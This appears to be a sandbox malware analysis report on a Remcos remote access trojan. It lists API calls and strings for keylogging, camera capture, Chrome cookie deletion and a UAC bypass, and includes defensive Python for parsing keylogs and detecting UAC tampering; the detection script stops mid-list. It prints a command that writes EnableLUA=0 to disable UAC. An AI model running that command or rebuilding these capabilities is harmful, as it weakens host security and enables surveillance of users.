                            • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                            • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                            APIs
                            • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                            • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                            • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                            • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                            • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                            APIs
                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 004075D0
                              • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                              • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                            • CoUninitialize.OLE32 ref: 00407629
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: InitializeObjectUninitialize_wcslen
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                            • API String ID: 3851391207-2637227304
                            • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                            • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                            • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                            • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                            • GetLastError.KERNEL32 ref: 0040BAE7
                            Strings
                            • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                            • UserProfile, xrefs: 0040BAAD
                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                            • [Chrome Cookies not found], xrefs: 0040BB01
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            • API String ID: 2018770650-304995407
                            • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                            • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                            • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                            • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                            APIs
                            • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                            • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AllocOutputShowWindow
                            • String ID: Remcos v$5.1.0 Pro$CONOUT$
                            • API String ID: 2425139147-1043272453
                            • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                            • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                            • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                            • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                            APIs
                            • __allrem.LIBCMT ref: 0043AC69
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                            • __allrem.LIBCMT ref: 0043AC9C
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                            • __allrem.LIBCMT ref: 0043ACD1
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1992179935-0
                            • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                            • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                            • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                            • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                            APIs
                            • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                              • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologSleep
                            • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                            • API String ID: 3469354165-3054508432
                            • Opcode ID: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
                            • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                            • Opcode Fuzzy Hash: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
                            • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                            APIs
                              • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                            • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                            • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                            • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                              • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                              • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                              • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                            • String ID:
                            • API String ID: 3950776272-0
                            • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                            • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                            • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                            • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe
                            • String ID:
                            • API String ID: 4189289331-0
                            • Opcode ID: 0b5e7e778a45d4ef5640b8f49a3a6f21ebcbf364a7a7050dd0a353773097b25c
                            • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                            • Opcode Fuzzy Hash: 0b5e7e778a45d4ef5640b8f49a3a6f21ebcbf364a7a7050dd0a353773097b25c
                            • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                            • String ID:
                            • API String ID: 493672254-0
                            • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                            • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                            • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                            • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                            APIs
                            • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                            • _free.LIBCMT ref: 0044824C
                            • _free.LIBCMT ref: 00448274
                            • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                            • _abort.LIBCMT ref: 00448293
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                            • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                            • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                            • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                            • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                            • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                            • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                            • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                            • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                            • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                            • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                            • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                            • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                            APIs
                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                            • wsprintfW.USER32 ref: 0040B1F3
                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventLocalTimewsprintf
                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                            • API String ID: 1497725170-248792730
                            • Opcode ID: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                            • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                            • Opcode Fuzzy Hash: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                            • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
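This function stamps the start of an offline keylog session: GetLocalTime feeds wsprintfW with the format "[%04i/%02i/%02i %02i:%02i:%02i ", and the strings "Offline Keylogger Started" and "]" sit beside it. GetLocalTime returns the victim's local time with no zone marker, so a recovered log has to be rebased to UTC with the host's offset before it goes on a timeline. The Python below is an added forensic example, not code from the report or from the sample. That the header is the format string, the message and the closing bracket in that order is an assumption read off the three strings, and the log it runs over is constructed.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Header layout assumed from the three strings in the function above:
#   "[%04i/%02i/%02i %02i:%02i:%02i " + message + "]"
# The message group is left generic so other session markers with the same stamp parse too.
HEADER = re.compile(
    r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (?P<event>[^\]]*)\]$"
)


def split_sessions(log_text: str, host_utc_offset_hours: float) -> List[Dict]:
    """Cut a recovered keylog into sessions, one per header, with UTC start times.

    The stamp comes from GetLocalTime, so it is the victim's wall-clock time with
    no zone information; the caller supplies the victim's UTC offset at capture time
    (including DST) and the function attaches it before converting to UTC.
    """
    host_tz = timezone(timedelta(hours=host_utc_offset_hours))
    sessions: List[Dict] = []
    for line in log_text.splitlines():
        m = HEADER.match(line.strip())
        if m:
            y, mo, d, h, mi, s = (int(g) for g in m.groups()[:6])
            local = datetime(y, mo, d, h, mi, s, tzinfo=host_tz)
            sessions.append({"event": m.group("event"), "start_local": local,
                             "start_utc": local.astimezone(timezone.utc), "text": []})
        elif sessions:
            # Captured keystrokes belong to the most recent header.
            sessions[-1]["text"].append(line)
        # Lines before the first header have no session and are dropped.
    return sessions


# Constructed sample keylog (not recovered from this sample's output).
SAMPLE_LOG = """[2024/07/19 14:03:07 Offline Keylogger Started]
user typed this
[2024/07/19 14:05:30 Offline Keylogger Started]
and this
"""

if __name__ == "__main__":
    for session in split_sessions(SAMPLE_LOG, host_utc_offset_hours=2.0):
        print(session["start_utc"].isoformat(), session["event"], session["text"])
```

The offset is a per-host input on purpose: the sandbox VM, the victim and the analyst's workstation can all be in different zones, and a keylog timeline built without rebasing will disagree with network and EDR timestamps by exactly that offset.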
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                            • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                            • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSizeSleep
                            • String ID: XQG
                            • API String ID: 1958988193-3606453820
                            • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                            • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                            • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                            • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                            APIs
                            • RegisterClassExA.USER32(00000030), ref: 0041D55B
                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                            • GetLastError.KERNEL32 ref: 0041D580
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCreateErrorLastRegisterWindow
                            • String ID: 0$MsgWindowClass
                            • API String ID: 2877667751-2410386613
                            • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                            • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                            • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                            • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                            APIs
                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                            • CloseHandle.KERNEL32(?), ref: 004077AA
                            • CloseHandle.KERNEL32(?), ref: 004077AF
                            Strings
                            • C:\Windows\System32\cmd.exe, xrefs: 00407796
                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreateProcess
                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                            • API String ID: 2922976086-4183131282
                            • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                            • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                            • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                            • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
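The CreateProcessA call above runs cmd.exe /k with a reg.exe ADD that writes 0 to EnableLUA under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System; the creation flags value 08000000 is CREATE_NO_WINDOW, so no console appears. Writing that key needs an elevated token, and the new value takes effect only after a reboot, but from then on UAC is off for every account on the host. The Python below is an added detection example, not code from the report or from the sample: it parses reg.exe ADD command lines the way a process-creation log records them and flags writes of 0 to EnableLUA under HKLM. As a generalisation beyond this sample it also watches ConsentPromptBehaviorAdmin and PromptOnSecureDesktop, the other standard UAC policy values under the same key. The command lines it runs over are constructed; the first is copied from the entry above.

```python
import re
from typing import Dict, List, Optional

# UAC policy location and the values that disable or weaken UAC when set to 0.
# EnableLUA is what the sample writes; the other two are the remaining standard
# UAC policy values under the same key, watched here as a generalisation (assumption).
POLICY_PATH = r"software\microsoft\windows\currentversion\policies\system"
HKLM_ALIASES = {"hklm", "hkey_local_machine"}
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}

# CreateProcess dwCreationFlags bits (winbase.h) needed to read the call above.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT", 0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}

# reg.exe ADD <key> ...; the key may be quoted and reg.exe may carry a full path.
REG_ADD = re.compile(
    r'\breg(?:\.exe)?\s+add\s+(?:"(?P<qkey>[^"]+)"|(?P<key>\S+))(?P<rest>.*)', re.IGNORECASE
)


def _option(rest: str, name: str) -> Optional[str]:
    """Value of a reg.exe switch such as /v or /d, quoted or bare."""
    m = re.search(r'/%s\s+(?:"([^"]*)"|(\S+))' % name, rest, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def classify_command_line(cmdline: str) -> Optional[Dict]:
    """Parse a reg.exe ADD command line into hive, path, value and data.

    Returns None for command lines that are not a reg.exe ADD. uac_tamper is set
    when a UAC policy value under HKLM is written as 0, the case that switches UAC
    off machine-wide after the next reboot. Hive aliases, quoting, forward slashes
    and letter case are normalised so trivial rewrites of the command still match.
    """
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    key = (m.group("qkey") or m.group("key")).replace("/", "\\").strip("\\").lower()
    hive, _, path = key.partition("\\")
    value = (_option(m.group("rest"), "v") or "").lower()
    data = (_option(m.group("rest"), "d") or "").lower()
    tamper = (hive in HKLM_ALIASES and path == POLICY_PATH
              and value in UAC_VALUES and data in {"0", "0x0"})
    return {"hive": hive, "path": path, "value": value, "data": data, "uac_tamper": tamper}


def flag_uac_tampering(cmdlines: List[str]) -> List[str]:
    """Command lines from a process-creation log that set a UAC policy value to 0."""
    flagged = []
    for cmdline in cmdlines:
        rec = classify_command_line(cmdline)
        if rec and rec["uac_tamper"]:
            flagged.append(cmdline)
    return flagged


def decode_creation_flags(flags: int) -> List[str]:
    """Names of the CreateProcess creation flags set in a dwCreationFlags value."""
    return [name for bit, name in CREATION_FLAGS.items() if flags & bit] or ["0"]


# Constructed process-creation command lines; the first is the one in the entry above.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f',
    r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f",
    r"reg add HKCU\Software\Contoso\App /v EnableLUA /t REG_DWORD /d 0 /f",
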